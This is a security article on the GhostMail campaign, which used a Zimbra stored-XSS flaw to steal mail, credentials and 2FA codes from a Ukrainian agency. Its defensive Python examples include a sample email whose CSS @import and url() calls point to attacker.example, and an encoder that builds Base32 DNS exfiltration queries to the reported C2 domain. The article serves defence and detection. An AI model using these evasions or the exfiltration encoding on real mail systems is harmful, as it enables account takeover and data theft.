Seqrite Labs has identified a narrowly targeted phishing campaign, dubbed "Operation GhostMail", that exploited a stored Cross-Site Scripting (XSS) flaw in Zimbra Collaboration Suite (ZCS) to compromise the Ukrainian State Hydrology Agency. This article walks through what the phishing email looked like and what the embedded payload did once it ran.
The campaign stands out because it relies on the email body alone: there are no malicious attachments, links or macros. The payload executes entirely inside the victim's browser, which is what gives the operation its stealth. With medium confidence, the Russian state-sponsored group APT28 is assessed to be behind it.

Weakness and Attack Path

The intrusion begins with a phishing email posing as a routine internship request. The message was sent on January 22, 2026 from a compromised student account at the National Academy of Internal Affairs (NAVS).
When the victim opens the email in the Zimbra Classic UI, a hidden JavaScript payload runs silently. It exploits CVE-2025-66376, a stored XSS flaw patched in November 2025 that stems from improper sanitization of CSS @import directives. To slip past Zimbra's built-in AntiSamy filter, the attackers injected noise directly into the HTML tag names.
(Image: GhostMail's targets, Ukrainian mail. Source: Seqrite)
The malformed tags defeat regex-based checks while remaining parseable by the browser: the browser's tokenizer reassembles the broken markup, and a Base64-encoded loader executes.
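To make the filter-bypass concrete, here is an added example written for this article (it is not Seqrite's code and not Zimbra's AntiSamy policy). It contrasts a naive regex blocklist, which edits the raw text, with an allowlist sanitizer that rebuilds the document from a real HTML parser's token stream. The constructed message mimics the internship-request lure. Its two evasions, an unclosed <style> element that a browser treats as running to the end of the document, and a url() inside a style attribute that a tag-level regex never inspects, are illustrative parser-differential cases; they are not the exact tag-name malformation used in GhostMail, which the article does not reproduce. The domain attacker.example and the sample text are assumptions.

```python
import re
from html import escape
from html.parser import HTMLParser

# Naive blocklist in the spirit of a regex-based filter: strips <style>..</style>
# and <script>..</script> pairs from the raw text. Illustrative only; this is not
# Zimbra's AntiSamy policy.
BLOCKLIST_RE = re.compile(r"<(style|script)\b[^>]*>.*?</\1\s*>", re.I | re.S)


def regex_sanitize(html: str) -> str:
    return BLOCKLIST_RE.sub("", html)


# Allowlist policy: only these tags and attributes survive; everything else is
# dropped, and dangerous CSS constructs inside style attributes are rejected.
ALLOWED_TAGS = {"p", "b", "i", "br", "a", "div", "span", "ul", "li"}
ALLOWED_ATTRS = {"a": {"href"}, "div": {"style"}, "span": {"style"}, "p": {"style"}}
VOID_TAGS = {"br"}
DROP_WITH_CONTENT = {"style", "script", "iframe", "object"}
CSS_DENY_RE = re.compile(r"@import|url\s*\(|expression\s*\(|javascript:", re.I)
SAFE_HREF_RE = re.compile(r"^(https?:|mailto:)", re.I)


class AllowlistSanitizer(HTMLParser):
    """Rebuilds the document from the parser's tokens instead of editing raw text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.drop_depth = 0  # >0 while inside an element whose content is discarded

    def handle_starttag(self, tag, attrs):
        if self.drop_depth:
            if tag in DROP_WITH_CONTENT:
                self.drop_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self.drop_depth = 1
            return
        if tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name == "style" and CSS_DENY_RE.search(value):
                continue  # @import, url(), expression(), javascript: never pass
            if name == "href" and not SAFE_HREF_RE.match(value.strip()):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self.drop_depth:
            if tag in DROP_WITH_CONTENT:
                self.drop_depth -= 1
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.drop_depth:
            self.out.append(escape(data))


def allowlist_sanitize(html: str) -> str:
    p = AllowlistSanitizer()
    p.feed(html)
    p.close()
    return "".join(p.out)


# Constructed sample: a lure body carrying two CSS-based evasions.
SAMPLE_EMAIL = (
    '<div style="color:red">Internship request</div>'
    '<style>@import url("https://attacker.example/x.css");</style>'
    '<p style="background:url(https://attacker.example/beacon.png)">Regards</p>'
    '<style>@import url(https://attacker.example/unclosed.css);'  # never closed
)

if __name__ == "__main__":
    print("regex    :", regex_sanitize(SAMPLE_EMAIL))
    print("allowlist:", allowlist_sanitize(SAMPLE_EMAIL))
```

The regex version removes the well-formed style block but leaves both the unclosed one and the url() in the paragraph's style attribute, so the @import still reaches the browser. The allowlist version never has to guess what the browser will reconstruct: it only emits tags and attributes it understands, which is the property a webmail sanitizer needs.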
This first-stage script decodes the final payload and injects it into the top-level document, escaping the webmail rendering frame and gaining the user's active session context and cookies.
(Image: GhostMail's goals, stealthy data exfiltration from Ukrainian mail. Source: Seqrite)
While the payload exists only in the browser's memory, it abuses Zimbra's legitimate SOAP API to perform actions the user never requested. By reading the CSRF token from local storage, the script makes its requests indistinguishable from normal webmail activity.
The stealer runs nine collection tasks in parallel to harvest as much as possible, including login credentials, session tokens, backup 2FA recovery codes and passwords saved in the browser.
(Image: GhostMail's goals, Ukrainian mail. Source: Seqrite)
It also establishes long-term persistence by silently creating an app-specific password and enabling IMAP access on the compromised account, so the attackers keep a way in after the browser session ends.
Attack component    Technical details
Target              Ukrainian Government's State Hydrology Agency
Exploited flaw      CVE-2025-66376 (ZCS stored XSS)
Delivery            HTML email with embedded JavaScript
Data stolen         90-day email archives, 2FA codes and passwords
Exfiltration        Dual-channel: HTTPS and Base32 over DNS
Threat actor        APT28 / Fancy Bear (medium confidence)

The most damaging capability is theft of the victim's entire mailbox: the script uses Zimbra's built-in export feature to download the last 90 days of email.
The stolen data is sent to the command-and-control (C2) domain zimbrasoft[.]com[.]ua over two channels so that delivery is assured: large blobs go over HTTPS, while smaller items are Base32-encoded and carried in DNS queries, which slips past common network blocks.
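As an added detection example (not from the Seqrite report), assume a resolver log with one query per line in the constructed format "timestamp client qname qtype". The detector below flags queries whose leading labels consist only of the Base32 alphabet and are far longer than ordinary hostnames, then restores the padding DNS cannot carry and decodes them. The secret text is invented, the small suffix table is a stand-in for a real public suffix list, and the encoder exists only to build a realistic sample query; the C2 domain is the one the article reports.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

# Minimal stand-in for a public suffix list so that names under com.ua, gov.ua
# etc. are grouped by their real registrable domain. A production detector
# should use the full PSL; these entries are an assumption for the example.
MULTI_LABEL_SUFFIXES = {"com.ua", "gov.ua", "co.uk", "com.au"}
B32_LABEL_RE = re.compile(r"^[A-Z2-7]+$")  # RFC 4648 Base32 alphabet, padding stripped
MIN_PAYLOAD_CHARS = 32   # Base32 characters across the leading labels
MIN_LONGEST_LABEL = 20   # ordinary hostnames are rarely this long


@dataclass
class Finding:
    client: str
    qname: str
    domain: str
    payload_chars: int
    decoded: Optional[str]  # None when the labels are not valid Base32


def registrable_domain(labels: List[str]) -> str:
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def decode_b32_labels(labels: List[str]) -> Optional[bytes]:
    joined = "".join(labels)
    padded = joined + "=" * (-len(joined) % 8)  # restore padding stripped for DNS
    try:
        return base64.b32decode(padded)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def inspect_query(client: str, qname: str) -> Optional[Finding]:
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) < 3:
        return None
    domain = registrable_domain(labels)
    payload = [l.upper() for l in labels[: -len(domain.split("."))]]
    if not payload or not all(B32_LABEL_RE.match(l) for l in payload):
        return None
    total = sum(len(l) for l in payload)
    if total < MIN_PAYLOAD_CHARS or max(len(l) for l in payload) < MIN_LONGEST_LABEL:
        return None
    raw = decode_b32_labels(payload)
    decoded = raw.decode("utf-8", "replace") if raw is not None else None
    return Finding(client, qname, domain, total, decoded)


def scan_log(text: str) -> List[Finding]:
    """Each line: <timestamp> <client> <qname> <qtype> (constructed format)."""
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        f = inspect_query(parts[1], parts[2])
        if f is not None:
            findings.append(f)
    return findings


def b32_labels(data: bytes, max_label: int = 63) -> List[str]:
    """Encode data the way a DNS channel must: Base32, no padding, <=63-char labels."""
    s = base64.b32encode(data).decode().rstrip("=")
    return [s[i:i + max_label] for i in range(0, len(s), max_label)]


# Constructed sample log. The secret text is invented; the C2 domain is the one
# reported for GhostMail, used here only to build a realistic query.
SAMPLE_SECRET = b"acct=hydro.admin;otp_backup=48213-99071-55820;imap=enabled"
EXFIL_QNAME = ".".join(b32_labels(SAMPLE_SECRET) + ["zimbrasoft", "com", "ua"])
SAMPLE_LOG = f"""\
2026-01-22T09:15:01Z 10.0.4.17 www.example.com A
2026-01-22T09:15:02Z 10.0.4.17 mail.hydro.gov.ua A
2026-01-22T09:15:03Z 10.0.4.17 autodiscover.corp.example.net A
2026-01-22T09:15:04Z 10.0.4.17 {EXFIL_QNAME} TXT
"""

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.client} -> {f.domain}: {f.payload_chars} Base32 chars, decoded={f.decoded!r}")
```

A real channel spreads a larger message over many queries, so in practice you would group findings by (client, domain), keep them in arrival order and concatenate the labels before decoding; the per-query check above is the building block, and the length thresholds are the knobs to tune against your own resolver's baseline.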